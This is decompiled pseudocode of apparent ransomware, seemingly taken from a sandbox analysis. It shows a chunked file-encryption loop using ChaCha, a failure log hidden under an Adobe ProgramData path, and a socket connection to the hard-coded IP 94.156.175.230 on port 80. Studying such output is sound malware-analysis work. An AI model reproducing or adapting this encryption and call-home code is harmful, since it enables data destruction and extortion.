                                                                    									_t723 = _t722 - 8;
                                                                    									_t1091 = _t720 + 8;
                                                                    									__eflags = _t1091;
                                                                    									_v2000 = _t723;
                                                                    									_v1968 = _t1091;
                                                                    									 *_t723 = _v1148;
                                                                    									_v2056 = _t1091;
                                                                    									do {
                                                                    										_push(_t1091);
                                                                    										_t724 = E00EAEBCD();
                                                                    										_t1131 = _t1131 + 4;
                                                                    										_v1992 = _t724;
                                                                    										__eflags = _t724;
                                                                    									} while (_t724 == 0);
                                                                    									_v1973 = 1;
                                                                    									E00EA4BE0( &_v1464,  &_v60,  &_v28, 0xc);
                                                                    									_t1132 = _t1131 + 0x10;
                                                                    									_t729 =  &_v60;
                                                                    									_t998 = 0x28;
                                                                    									do {
                                                                    										 *_t729 = 0;
                                                                    										_t729 = _t729 + 1;
                                                                    										_t998 = _t998 - 1;
                                                                    										__eflags = _t998;
                                                                    									} while (_t998 != 0);
                                                                    									_v1984 = _t998;
                                                                    									_v2008 = _t998;
                                                                    									_v1176 = _t998;
                                                                    									asm("xorps xmm0, xmm0");
                                                                    									_t999 = _v1944;
                                                                    									_v1988 = _t1102 + 0x10;
                                                                    									asm("adc ecx, 0x0");
                                                                    									__eflags = _t1102 | _v1944;
                                                                    									asm("movups [ebp-0x4a4], xmm0");
                                                                    									if((_t1102 | _v1944) == 0) {
                                                                    										_t999 = _v1972;
                                                                    										_v1988 = _v1956 + 0x10;
                                                                    										asm("adc ecx, 0x0");
                                                                    									}
                                                                    									_t1092 = _v1988;
                                                                    									_v2036 = _t999;
                                                                    									do {
                                                                    										_t734 = E00EAF157(_t1092, 0x10000);
                                                                    										_t1132 = _t1132 + 8;
                                                                    										_v1964 = _t734;
                                                                    										__eflags = _t734;
                                                                    									} while (_t734 == 0);
                                                                    									_t1057 = _v1944;
                                                                    									__eflags = _t1102 | _t1057;
                                                                    									_t1085 = _v1996;
                                                                    									_v1938 = 0;
                                                                    									if((_t1102 | _t1057) == 0) {
                                                                    										L160:
                                                                    										_v1960 = _v2016;
                                                                    										_t736 = _v2020.LowPart;
                                                                    										_v1948 = _t736;
                                                                    										goto L162;
                                                                    									} else {
                                                                    										__eflags = _t1057 - _v1972;
                                                                    										if(__eflags > 0) {
                                                                    											goto L160;
                                                                    										} else {
                                                                    											if(__eflags < 0) {
                                                                    												L104:
                                                                    												_t814 = _v1937 & 0x000000ff;
                                                                    												_v2068 = _t814;
                                                                    												__eflags = _t814 + 1;
                                                                    												_t816 = E00EA8320(_t814 + 1, 0, _t1102, _t1057);
                                                                    												_t1018 = _v2016;
                                                                    												_v2064 = _t816;
                                                                    												_t817 = _v2020;
                                                                    												_v2036 = _t1057;
                                                                    												while(1) {
                                                                    													_v2016 = _t817;
                                                                    													_v1948 = _t817 + _v2064;
                                                                    													asm("adc eax, edx");
                                                                    													_v2012.LowPart = _t1018;
                                                                    													__eflags = _v1938;
                                                                    													_v1960 = _t1018;
                                                                    													if(_v1938 != 0) {
                                                                    														goto L113;
                                                                    													}
                                                                    													__eflags =  *_a32 - 2;
                                                                    													if( *_a32 < 2) {
                                                                    														goto L113;
                                                                    													} else {
                                                                    														__eflags = _t1085;
                                                                    														if(_t1085 == 0) {
                                                                    															L109:
                                                                    															ReadFile(_v1980, _v1964, _t1102,  &_v1144, 0);
                                                                    															_t872 = E00EA5640( &_v1144,  &_v1464, _v1964, _v1964, _t1102);
                                                                    															_t1134 = _t1134 + 0x10;
                                                                    															__eflags = _t872 - _t1102;
                                                                    															if(_t872 != _t1102) {
                                                                    																L185:
                                                                    																_t1057 = 1;
                                                                    																_t963 = L"chacha faild";
                                                                    																E00E59EB0(_t953, _t963, 1, _t1085, _t1102);
                                                                    																SetLastError(0);
                                                                    																goto L186;
                                                                    															} else {
                                                                    																__eflags = 0 - _v1944;
                                                                    																if(0 != _v1944) {
                                                                    																	goto L185;
                                                                    																} else {
                                                                    																	__eflags = _t1085;
                                                                    																	if(_t1085 != 0) {
                                                                    																		E00EA5E5C(_t1085);
                                                                    																		_t1134 = _t1134 + 4;
                                                                    																	}
                                                                    																	L138:
                                                                    																	_t1057 =  &_v1172;
                                                                    																	_t963 =  ~_t1102;
                                                                    																	_push(1);
                                                                    																	asm("adc eax, 0x0");
                                                                    																	SetFilePointerEx(_v1980, _t963,  ~_v1944, _t1057);
                                                                    																	L139:
                                                                    																	__eflags = _v1973;
                                                                    																	if(_v1973 != 0) {
                                                                    																		_t1057 = _v1964;
                                                                    																		E00EA90F0(_v1992, _t1057, _v1968);
                                                                    																		E00EA90F0(_v1964, _v2000, _v1968);
                                                                    																		_t1134 = _t1134 + 0x18;
                                                                    																		__eflags = 0;
                                                                    																		_v1973 = 0;
                                                                    																	}
                                                                    																	__eflags = _t1085;
                                                                    																	if(_t1085 == 0) {
                                                                    																		L143:
                                                                    																		WriteFile(_v1980, _v1964, _t1102,  &_v1156, 0);
                                                                    																		__eflags = _t1085;
                                                                    																		if(_t1085 != 0) {
                                                                    																			E00EA5E5C(_t1085);
                                                                    																			_t1134 = _t1134 + 4;
                                                                    																		}
                                                                    																		__eflags = _v1156;
                                                                    																		if(_v1156 == 0) {
                                                                    																			L186:
                                                                    																			_t753 = GetLastError();
                                                                    																			__eflags = _a24;
                                                                    																			if(_a24 == 0) {
                                                                    																				L191:
                                                                    																				__eflags =  *0xeef9d6;
                                                                    																				if( *0xeef9d6 == 0) {
                                                                    																					_t765 = E00E83430(_t953,  &_v2092, _t753, _t1085, _t1102);
                                                                    																					_v8 = 4;
                                                                    																					_t766 = E00E73F90(_t953,  &_v2116, L" error:", _t765);
                                                                    																					_t1137 = _t1134 + 4;
                                                                    																					_v8 = 5;
                                                                    																					__eflags =  *((intOrPtr*)(_t766 + 0x14)) - 8;
                                                                    																					if( *((intOrPtr*)(_t766 + 0x14)) >= 8) {
                                                                    																						_t766 =  *_t766;
                                                                    																					}
                                                                    																					_t768 = E00E59DB0( &_v2052,  *_v2024, _t766);
                                                                    																					_v8 = 6;
                                                                    																					_push(0);
                                                                    																					_push(0x7d0);
                                                                    																					_t1138 = _t1137 - 0x18;
                                                                    																					_v2036 = _t1138;
                                                                    																					_push(L"\\ProgramData\\Adobe\\Extension Manager CC\\Logs\\fails.txt");
                                                                    																					E00E73CB0(_t953, _t1138, L"\\\\?\\c:", _t1085);
                                                                    																					_v8 = 7;
                                                                    																					_v8 = 6;
                                                                    																					E00E68470(_t953, 1, _t768);
                                                                    																					_v8 = 5;
                                                                    																					E00EAEBD8(_v2052);
                                                                    																					_t1134 = _t1138 + 0x28;
                                                                    																					_v8 = 4;
                                                                    																					L00E59AF0(_t953,  &_v2116, _t1085);
                                                                    																					_v8 = 0xffffffff;
                                                                    																					L00E59AF0(_t953,  &_v2092, _t1085);
                                                                    																				}
                                                                    																				goto L195;
                                                                    																			} else {
                                                                    																				__eflags = _t753 - 0x21;
                                                                    																				if(_t753 == 0x21) {
                                                                    																					L189:
                                                                    																					_t1085 = _v2028;
                                                                    																					_t1102 = _v2048 + _v2048 * 2;
                                                                    																					_t775 =  *0xf2c12c; // 0x81d240
                                                                    																					_t624 = E00EA5E4B( *((intOrPtr*)( *((intOrPtr*)(_t775 + _t1102 * 4)) + _t1085 * 4)));
                                                                    																					_t1123 = _t1134 + 4;
                                                                    																					__eflags = _t624;
                                                                    																					if(_t624 != 0) {
                                                                    																						goto L209;
                                                                    																					} else {
                                                                    																						_t778 =  *0xf2c108; // 0x819360
                                                                    																						E00E6EFA0( *((intOrPtr*)(_t778 + _t1102 * 4)) + _t1085 * 8, _t1057, _v2024);
                                                                    																						_t781 =  *0xf2c12c; // 0x81d240
                                                                    																						E00EA5E5C( *((intOrPtr*)( *((intOrPtr*)(_t781 + _t1102 * 4)) + _t1085 * 4)));
                                                                    																						_t1134 = _t1123 + 4;
                                                                    																						L195:
                                                                    																						E00EAF13D(_v1964);
                                                                    																						_t755 = _v1984;
                                                                    																						_t1135 = _t1134 + 4;
                                                                    																						__eflags = _t755;
                                                                    																						if(_t755 != 0) {
                                                                    																							E00EAF13D(_t755);
                                                                    																							_t1135 = _t1135 + 4;
                                                                    																						}
                                                                    																						CloseHandle(_v1952);
                                                                    																						CloseHandle(_v1980);
                                                                    																						_t758 = _v2008;
                                                                    																						__eflags = _t758;
                                                                    																						if(_t758 != 0) {
                                                                    																							CloseHandle(_t758);
                                                                    																						}
                                                                    																						_v2032[9] = 0;
                                                                    																						E00EAEBD8(_v1992);
                                                                    																						goto L200;
                                                                    																					}
                                                                    																				} else {
                                                                    																					__eflags = _t753 - 0x20;
                                                                    																					if(_t753 != 0x20) {
                                                                    																						goto L191;
                                                                    																					} else {
                                                                    																						goto L189;
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																		} else {
                                                                    																			__eflags = _v1937;
                                                                    																			if(_v1937 <= 0) {
                                                                    																				L151:
                                                                    																				_t831 = _v1960;
                                                                    																				_t1021 = _v1948;
                                                                    																				L152:
                                                                    																				_t1022 = _t1021 + _t1102;
                                                                    																				asm("adc eax, [ebp-0x794]");
                                                                    																				__eflags = _t831 - _v1972;
                                                                    																				if(__eflags > 0) {
                                                                    																					goto L161;
                                                                    																				} else {
                                                                    																					if(__eflags < 0) {
                                                                    																						L155:
                                                                    																						_t817 = _v1948;
                                                                    																						_t1018 = _v1960;
                                                                    																						_t1057 = _v2036;
                                                                    																						continue;
                                                                    																					} else {
                                                                    																						__eflags = _t1022 - _v1956;
                                                                    																						if(_t1022 > _v1956) {
                                                                    																							goto L161;
                                                                    																						} else {
                                                                    																							goto L155;
                                                                    																						}
                                                                    																					}
                                                                    																				}
                                                                    																			} else {
                                                                    																				asm("cdq");
                                                                    																				_v2012.LowPart = E00EA8320(_v2068, _t1057, _t1102, _v1944);
                                                                    																				_t835 = _v1948 + _t1102;
                                                                    																				_v2016 = _t1057;
                                                                    																				_t1057 = _v1944;
                                                                    																				asm("adc ecx, edx");
                                                                    																				__eflags = _v1960 - _v1972;
                                                                    																				if(__eflags > 0) {
                                                                    																					L156:
                                                                    																					_t837 = _v1948 - _v2012.LowPart;
                                                                    																					asm("sbb ecx, [ebp-0x7dc]");
                                                                    																					_t1026 = _v1956 - _t837;
                                                                    																					_v1948 = _t837;
                                                                    																					asm("sbb eax, [ebp-0x7a4]");
                                                                    																					__eflags = _v1972 - _t1057;
                                                                    																					if(__eflags < 0) {
                                                                    																						L161:
                                                                    																						_t736 = _v1948;
                                                                    																					} else {
                                                                    																						if(__eflags > 0) {
                                                                    																							L159:
                                                                    																							_t736 = _v1956 - _t1102;
                                                                    																							_v1948 = _t736;
                                                                    																							asm("sbb ecx, edx");
                                                                    																							_v1960 = _v1972;
                                                                    																						} else {
                                                                    																							__eflags = _t1026 - _t1102;
                                                                    																							if(_t1026 <= _t1102) {
                                                                    																								goto L161;
                                                                    																							} else {
                                                                    																								goto L159;
                                                                    																							}
                                                                    																						}
                                                                    																					}
                                                                    																					L162:
                                                                    																					_push(0);
                                                                    																					_t963 =  &_v1172;
                                                                    																					SetFilePointerEx(_v1952, _t736, _v1960, _t963);
                                                                    																					__eflags = _t1085;
                                                                    																					if(_t1085 == 0) {
                                                                    																						L164:
                                                                    																						_t1002 =  &_v1144;
                                                                    																						_t739 = _v1956 - _v1948;
                                                                    																						_v2036 = _t739;
                                                                    																						ReadFile(_v1952, _v1964, _t739,  &_v1144, 0);
                                                                    																						__eflags = _t1085;
                                                                    																						if(_t1085 != 0) {
                                                                    																							E00EA5E5C(_t1085);
                                                                    																							_t1132 = _t1132 + 4;
                                                                    																						}
                                                                    																						_t743 = E00EA5640(_t1002,  &_v1464, _v1964, _v1964, _v2036);
                                                                    																						asm("sbb ecx, [ebp-0x7b0]");
                                                                    																						_push(1);
                                                                    																						_v1996 = _t743;
                                                                    																						SetFilePointerEx(_v1952, _v1948 - _v1956, _v1960,  &_v1172);
                                                                    																						_t749 = E00EA4B70( &_v1464, _v1964 + _v1996);
                                                                    																						_t1134 = _t1132 + 0x18;
                                                                    																						_t1057 = _v1972;
                                                                    																						_t963 = _v1996 + _t749;
                                                                    																						_v1996 = _t963;
                                                                    																						asm("sbb edx, [ebp-0x7a4]");
                                                                    																						_v2036 = 0;
                                                                    																						__eflags = _t963 - _v1956 - _v1948;
                                                                    																						if(_t963 != _v1956 - _v1948) {
                                                                    																							goto L185;
                                                                    																						} else {
                                                                    																							__eflags = _v2036 - _t1057;
                                                                    																							if(_v2036 != _t1057) {
                                                                    																								goto L185;
                                                                    																							} else {
                                                                    																								_t1102 = _t1102 | _v1944;
                                                                    																								__eflags = _t1102;
                                                                    																								if(_t1102 == 0) {
                                                                    																									_t1057 = _v1968;
                                                                    																									__eflags = _t1057 - _t963;
                                                                    																									_t1102 =  <  ? _t1057 : _t963;
                                                                    																									E00EA90F0(_v1992 - _t1102 + _t1057, _v1964, _t1102);
                                                                    																									E00EA90F0(_v1964, _v2000, _t1102);
                                                                    																									__eflags = _v2000 + _t1102;
                                                                    																									E00EA90F0(_v1992, _v2000 + _t1102, _v1968 - _t1102);
                                                                    																									_t1134 = _t1134 + 0x24;
                                                                    																								}
                                                                    																								__eflags = _t1085;
                                                                    																								if(_t1085 == 0) {
                                                                    																									L172:
                                                                    																									_t963 = _v1996;
                                                                    																									_t1102 = _v1964;
                                                                    																									WriteFile(_v1952, _t1102, _t963,  &_v1156, 0);
                                                                    																									__eflags = _t1085;
                                                                    																									if(_t1085 == 0) {
                                                                    																										L174:
                                                                    																										WriteFile(_v1952, _v1992, _v1968,  &_v1156, 0);
                                                                    																										__eflags = _t1085;
                                                                    																										if(_t1085 != 0) {
                                                                    																											E00EA5E5C(_t1085);
                                                                    																											_t1134 = _t1134 + 4;
                                                                    																										}
                                                                    																										E00EAEBD8(_v1992);
                                                                    																										_v2032[9] = 0;
                                                                    																										E00EAF13D(_t1102);
                                                                    																										_t792 = _v1984;
                                                                    																										__eflags = _t792;
                                                                    																										if(_t792 != 0) {
                                                                    																											E00EAF13D(_t792);
                                                                    																										}
                                                                    																										_t1108 = _v1980;
                                                                    																										CloseHandle(_t1108);
                                                                    																										_t794 = _v2008;
                                                                    																										__eflags = _t794;
                                                                    																										if(_t794 != 0) {
                                                                    																											CloseHandle(_t794);
                                                                    																										}
                                                                    																										_t795 = _v1952;
                                                                    																										__eflags = _t795 - _t1108;
                                                                    																										if(_t795 != _t1108) {
                                                                    																											CloseHandle(_t795);
                                                                    																										}
                                                                    																										_t1017 = 0x80;
                                                                    																										_t796 =  &_v1464;
                                                                    																										do {
                                                                    																											 *_t796 = 0;
                                                                    																											_t796 = _t796 + 1;
                                                                    																											_t1017 = _t1017 - 1;
                                                                    																											__eflags = _t1017;
                                                                    																										} while (_t1017 != 0);
                                                                    																										goto L184;
                                                                    																									} else {
                                                                    																										E00EA5E5C(_t1085);
                                                                    																										_t623 = E00EA5E4B(_t1085);
                                                                    																										_t1123 = _t1134 + 8;
                                                                    																										__eflags = _t623;
                                                                    																										if(_t623 != 0) {
                                                                    																											goto L208;
                                                                    																										} else {
                                                                    																											goto L174;
                                                                    																										}
                                                                    																									}
                                                                    																								} else {
                                                                    																									_t622 = E00EA5E4B(_t1085);
                                                                    																									_t1123 = _t1134 + 4;
                                                                    																									__eflags = _t622;
                                                                    																									if(_t622 != 0) {
                                                                    																										goto L207;
                                                                    																									} else {
                                                                    																										goto L172;
                                                                    																									}
                                                                    																								}
                                                                    																							}
                                                                    																						}
                                                                    																					} else {
                                                                    																						_t621 = E00EA5E4B(_t1085);
                                                                    																						_t1123 = _t1132 + 4;
                                                                    																						__eflags = _t621;
                                                                    																						if(_t621 != 0) {
                                                                    																							goto L206;
                                                                    																						} else {
                                                                    																							goto L164;
                                                                    																						}
                                                                    																					}
                                                                    																				} else {
                                                                    																					if(__eflags < 0) {
                                                                    																						L150:
                                                                    																						_push(1);
                                                                    																						SetFilePointerEx(_v1980, _v2012.LowPart, _v2016,  &_v1172);
                                                                    																						goto L151;
                                                                    																					} else {
                                                                    																						__eflags = _t835 - _v1956;
                                                                    																						if(_t835 > _v1956) {
                                                                    																							goto L156;
                                                                    																						} else {
                                                                    																							goto L150;
                                                                    																						}
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																		}
                                                                    																	} else {
                                                                    																		_t843 = E00EA5E4B(_t1085);
                                                                    																		_t1123 = _t1134 + 4;
                                                                    																		__eflags = _t843;
                                                                    																		if(_t843 != 0) {
                                                                    																			goto L202;
                                                                    																		} else {
                                                                    																			goto L143;
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    														} else {
                                                                    															_t843 = E00EA5E4B(_t1085);
                                                                    															_t1123 = _t1134 + 4;
                                                                    															__eflags = _t843;
                                                                    															if(_t843 != 0) {
                                                                    																goto L202;
                                                                    															} else {
                                                                    																goto L109;
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    													goto L225;
                                                                    													L113:
                                                                    													__eflags = _v1984;
                                                                    													if(_v1984 != 0) {
                                                                    														L123:
                                                                    														E00EA90F0(_v1964, _v1984, _v1988);
                                                                    														_t1057 = _v1948;
                                                                    														_t1142 = _t1132 + 0xc;
                                                                    														_t1020 = _t1057 + _t1102;
                                                                    														asm("adc eax, [ebp-0x794]");
                                                                    														__eflags = _v1960 - _v1972;
                                                                    														if(__eflags < 0) {
                                                                    															L127:
                                                                    															_v1180 = _v1960;
                                                                    															_v1184 = _t1057;
                                                                    															__eflags = _t1085;
                                                                    															if(_t1085 == 0) {
                                                                    																L129:
                                                                    																SetEvent(_v2032[1]);
                                                                    																goto L130;
                                                                    															} else {
                                                                    																_t843 = E00EA5E4B(_t1085);
                                                                    																_t1123 = _t1142 + 4;
                                                                    																__eflags = _t843;
                                                                    																if(_t843 != 0) {
                                                                    																	goto L202;
                                                                    																} else {
                                                                    																	goto L129;
                                                                    																}
                                                                    															}
                                                                    														} else {
                                                                    															if(__eflags > 0) {
                                                                    																L126:
                                                                    																_v1938 = 2;
                                                                    																L130:
                                                                    																_t828 = E00EA5640(_t1020,  &_v1464, _v1964, _v1964, _t1102);
                                                                    																_t1134 = _t1142 + 0x10;
                                                                    																_t963 = 0;
                                                                    																__eflags = _t828 - _t1102;
                                                                    																if(_t828 != _t1102) {
                                                                    																	goto L185;
                                                                    																} else {
                                                                    																	__eflags = 0 - _v1944;
                                                                    																	if(0 != _v1944) {
                                                                    																		goto L185;
                                                                    																	} else {
                                                                    																		__eflags = _v1938 - 2;
                                                                    																		if(_v1938 == 2) {
                                                                    																			goto L139;
                                                                    																		} else {
                                                                    																			WaitForSingleObject( *_v2032, 0xffffffff);
                                                                    																			__eflags = _t1085;
                                                                    																			if(_t1085 != 0) {
                                                                    																				E00EA5E5C(_t1085);
                                                                    																				_t1134 = _t1134 + 4;
                                                                    																			}
                                                                    																			__eflags = _v1144 - _t1102;
                                                                    																			if(_v1144 != _t1102) {
                                                                    																				goto L186;
                                                                    																			} else {
                                                                    																				__eflags = 0 - _v1944;
                                                                    																				if(0 != _v1944) {
                                                                    																					goto L186;
                                                                    																				} else {
                                                                    																					__eflags = _v1938;
                                                                    																					if(_v1938 == 0) {
                                                                    																						goto L138;
                                                                    																					}
                                                                    																					goto L139;
                                                                    																				}
                                                                    																			}
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															} else {
                                                                    																__eflags = _t1020 - _v1956;
                                                                    																if(_t1020 <= _v1956) {
                                                                    																	goto L127;
                                                                    																} else {
                                                                    																	goto L126;
                                                                    																}
                                                                    															}
                                                                    														}
                                                                    													} else {
                                                                    														_t1110 = _v1988;
                                                                    														do {
                                                                    															_t1094 = E00EAF157(_t1110, 0x10000);
                                                                    															_t1134 = _t1134 + 8;
                                                                    															_v1984 = _t1094;
                                                                    															__eflags = _t1094;
                                                                    														} while (_t1094 == 0);
                                                                    														_t1085 = _v1996;
                                                                    														_t1102 = _v2060;
                                                                    														__eflags = _t1085;
                                                                    														if(_t1085 == 0) {
                                                                    															L118:
                                                                    															ReadFile(_v1980, _v1984, _t1102,  &_v1144, 0);
                                                                    															__eflags = _t1085;
                                                                    															if(_t1085 != 0) {
                                                                    																E00EA5E5C(_t1085);
                                                                    																_t1132 = _t1134 + 4;
                                                                    															}
                                                                    															_t1057 =  &_v1172;
                                                                    															asm("adc eax, 0x0");
                                                                    															_t861 = SetFilePointerEx(_v1980,  ~_t1102,  ~_v1944, _t1057);
                                                                    															__imp__ReOpenFile(_v1980, 0x120089, 3, 0x30000000, 1);
                                                                    															_t1031 = _t861;
                                                                    															_v2008 = _t1031;
                                                                    															__eflags = _t1031 - 0xffffffff;
                                                                    															if(_t1031 != 0xffffffff) {
                                                                    																_t1075 = _v2032;
                                                                    																_v1938 = 1;
                                                                    																_t1075[8] =  &_v1144;
                                                                    																_t1075[7] = _v1944;
                                                                    																_t1075[9] = _v1984;
                                                                    																_t1075[6] = _t1102;
                                                                    																_t1075[3] = _t1031;
                                                                    																_t1075[4] =  &_v1192;
                                                                    																goto L123;
                                                                    															} else {
                                                                    																_t1021 = _v2016;
                                                                    																_t831 = _v2012;
                                                                    																_v1938 = 0;
                                                                    																_v1948 = _t1021;
                                                                    																_v1960 = _t831;
                                                                    																goto L152;
                                                                    															}
                                                                    														} else {
                                                                    															_t843 = E00EA5E4B(_t1085);
                                                                    															_t1123 = _t1134 + 4;
                                                                    															__eflags = _t843;
                                                                    															if(_t843 != 0) {
                                                                    																goto L202;
                                                                    															} else {
                                                                    																goto L118;
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    													goto L225;
                                                                    												}
                                                                    											} else {
                                                                    												__eflags = _t1102 - _v1956;
                                                                    												if(_t1102 > _v1956) {
                                                                    													goto L160;
                                                                    												} else {
                                                                    													goto L104;
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							if(__eflags > 0) {
                                                                    								L29:
                                                                    								__eflags = _t1085;
                                                                    								if(_t1085 == 0) {
                                                                    									L31:
                                                                    									ReadFile(_v1952,  &_v1152, 4,  &_v1144, 0);
                                                                    									__eflags = _t1085;
                                                                    									if(_t1085 != 0) {
                                                                    										E00EA5E5C(_t1085);
                                                                    										_t1122 = _t1122 + 4;
                                                                    									}
                                                                    									_t916 = E00EAF3B0( &_v1148,  &_v1152, 4);
                                                                    									_t1122 = _t1122 + 0xc;
                                                                    									__eflags = _t916;
                                                                    									if(_t916 != 0) {
                                                                    										_push(0);
                                                                    										asm("xorps xmm0, xmm0");
                                                                    										asm("movlpd [ebp-0x7f4], xmm0");
                                                                    										SetFilePointerEx(_v1952, _v2040, _v2036,  &_v1172);
                                                                    										_t962 = _v1956;
                                                                    										goto L37;
                                                                    									} else {
                                                                    										_t1096 = _v1952;
                                                                    										CloseHandle(_t1096);
                                                                    										__eflags = _t1096 - _t1101;
                                                                    										if(_t1096 == _t1101) {
                                                                    											L184:
                                                                    										} else {
                                                                    											CloseHandle(_t1101);
                                                                    										}
                                                                    										goto L201;
                                                                    									}
                                                                    								} else {
                                                                    									_t844 = E00EA5E4B(_t1085);
                                                                    									_t1123 = _t1122 + 4;
                                                                    									__eflags = _t844;
                                                                    									if(_t844 != 0) {
                                                                    										goto L203;
                                                                    									} else {
                                                                    										goto L31;
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								__eflags = _t962 - 4;
                                                                    								if(_t962 <= 4) {
                                                                    									goto L37;
                                                                    								} else {
                                                                    									goto L29;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						_t1097 = _v1952;
                                                                    						__eflags = _t1097 - _t1101;
                                                                    						if(_t1097 != _t1101) {
                                                                    							CloseHandle(_t1101);
                                                                    						}
                                                                    						CloseHandle(_t1097);
                                                                    						goto L200;
                                                                    					}
                                                                    				} else {
                                                                    					_t1102 = GetLastError();
                                                                    					if(_t1102 != 5) {
                                                                    						L3:
                                                                    						if(_t1102 == 0x21 || _t1102 == 0x20) {
                                                                    							__eflags = _a24;
                                                                    							if(_a24 == 0) {
                                                                    								goto L14;
                                                                    							} else {
                                                                    								_t963 = _v2028;
                                                                    								_t1085 = _v2048 + _v2048 * 2;
                                                                    								_t938 =  *0xf2c12c; // 0x81d240
                                                                    								_t843 = E00EA5E4B( *((intOrPtr*)( *((intOrPtr*)(_t938 + _t1085 * 4)) + _t963 * 4)));
                                                                    								_t1123 = _t1122 + 4;
                                                                    								__eflags = _t843;
                                                                    								if(_t843 != 0) {
                                                                    									L202:
                                                                    									_push(_t843);
                                                                    									_t844 = E00EA5F4D(_t953, _t963, _t1057, _t1085, _t1102);
                                                                    									L203:
                                                                    									_push(_t844);
                                                                    									_t845 = E00EA5F4D(_t953, _t963, _t1057, _t1085, _t1102);
                                                                    									L204:
                                                                    									_push(_t845);
                                                                    									_t620 = E00EA5F4D(_t953, _t963, _t1057, _t1085, _t1102);
                                                                    									L205:
                                                                    									_push(_t620);
                                                                    									_t621 = E00EA5F4D(_t953, _t963, _t1057, _t1085, _t1102);
                                                                    									L206:
                                                                    									_push(_t621);
                                                                    									_t622 = E00EA5F4D(_t953, _t963, _t1057, _t1085, _t1102);
                                                                    									L207:
                                                                    									_push(_t622);
                                                                    									_t623 = E00EA5F4D(_t953, _t963, _t1057, _t1085, _t1102);
                                                                    									L208:
                                                                    									_push(_t623);
                                                                    									_t624 = E00EA5F4D(_t953, _t963, _t1057, _t1085, _t1102);
                                                                    									L209:
                                                                    									E00EA5F4D(_t953, _t963, _t1057, _t1085, _t1102);
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									asm("int3");
                                                                    									_t1120 = _t1123;
                                                                    									_t627 =  *0xeef074; // 0xa6abe2d4
                                                                    									_t628 = _t627 ^ _t1120;
                                                                    									_v2136 = _t628;
                                                                    									_t629 =  &_v2132;
                                                                    									 *[fs:0x0] = _t629;
                                                                    									_v2216 = _t1057;
                                                                    									_t1086 = _t963;
                                                                    									_v2124 = 0;
                                                                    									__imp__#23(2, 1, 6, _t628, _t1085, _t1102, _t953,  *[fs:0x0], E00EC7F1D, 0xffffffff, _t1119, _t624); // executed
                                                                    									_t1103 = _t629;
                                                                    									__imp__#11("94.156.175.230");
                                                                    									_v2208 = _t629;
                                                                    									_v2212 = 2;
                                                                    									__imp__#9(0x50);
                                                                    									_v2210 = 2;
                                                                    									_t631 =  &_v2212;
                                                                    									__imp__#4(_t1103, _t631, 0x10); // executed
                                                                    									__eflags = _t631;
                                                                    									if(_t631 != 0) {
                                                                    										L223:
                                                                    										__imp__#3(_t1103);
                                                                    										_t954 = 0;
                                                                    										__eflags = 0;
                                                                    									} else {
                                                                    										_v84 = 0xea60;
                                                                    										__imp__#21(_t1103, 0xffff, 0x1006,  &_v84, 4); // executed
                                                                    										__imp__#21(_t1103, 0xffff, 0x1005,  &_v84, 4); // executed
                                                                    										__eflags = _a20 - 0x10;
                                                                    										_t638 =  >=  ? _v0 :  &_v0;
                                                                    										__imp__#19(_t1103,  >=  ? _v0 :  &_v0, _a16, 0); // executed
                                                                    										__eflags =  *0xf2925c - 0x10;
                                                                    										_t640 =  >=  ?  *0xf29248 : 0xf29248;
                                                                    										__imp__#19(_t1103,  >=  ?  *0xf29248 : 0xf29248,  *0xf29258, 0); // executed
                                                                    										_push(1);
                                                                    										_v40 = 0;
                                                                    										_v36 = 0;
                                                                    										_v40 = 0;
                                                                    										_v36 = 0xf;
                                                                    										_v56 = 0;
                                                                    										L00E83CB0(_t953,  &_v56, "/");
                                                                    										_v12 = 1;
                                                                    										_t642 =  *0xf2c09c & 0x0000ffff;
                                                                    										_t970 = _t642;
                                                                    										_t643 = _t642 - 1;
                                                                    										_t956 = _t643 & 0x0000ffff;
                                                                    										_v112 = _t643 & 0x0000ffff;
                                                                    										_t1059 = _t956 >> 8;
                                                                    										_t957 = _t956 >> 8;
                                                                    										__eflags = _v104 - 0x70;
                                                                    										_v108 = _t956 >> 8;
                                                                    										if(_v104 == 0x70) {
                                                                    											_v112 =  *0xf2c09c & 0x0000ffff;
                                                                    											_t1059 = _t970 >> 8;
                                                                    											_t985 = _t970 >> 8;
                                                                    											__eflags = _t985;
                                                                    											_v108 = _t970 >> 8;
                                                                    											_t957 = _t985;
                                                                    										}
                                                                    										_t971 = _v40;
                                                                    										_t513 = _t971 + 4; // 0x4
                                                                    										_t647 = _t513;
                                                                    										__eflags = _t647 - _t971;
                                                                    										if(_t647 > _t971) {
                                                                    											__eflags = _t647 - _t971;
                                                                    											_push(0);
                                                                    											E00E73160(_t957,  &_v56, _t1086, _t647 - _t971);
                                                                    											_t1059 = _t957;
                                                                    										} else {
                                                                    											__eflags = _v36 - 0x10;
                                                                    											_t984 =  &_v56;
                                                                    											if(_v36 >= 0x10) {
                                                                    												_t984 = _v56;
                                                                    												_t1059 = _v108;
                                                                    											}
                                                                    											_v40 = _t647;
                                                                    											 *((char*)(_t984 + _t647)) = 0;
                                                                    										}
                                                                    										_t1060 = _v112;
                                                                    										_t651 = (_t1059 & 0x000000ff) >> 4;
                                                                    										__eflags = _v36 - 0x10;
                                                                    										_t524 = _t651 + "0123456789ABCDEF"; // 0x37363534
                                                                    										_t653 =  >=  ? _v56 :  &_v56;
                                                                    										 *((char*)(( >=  ? _v56 :  &_v56) + 1)) =  *_t524 & 0x000000ff;
                                                                    										_t655 = _t1060 & 0x0000000f;
                                                                    										__eflags = _v36 - 0x10;
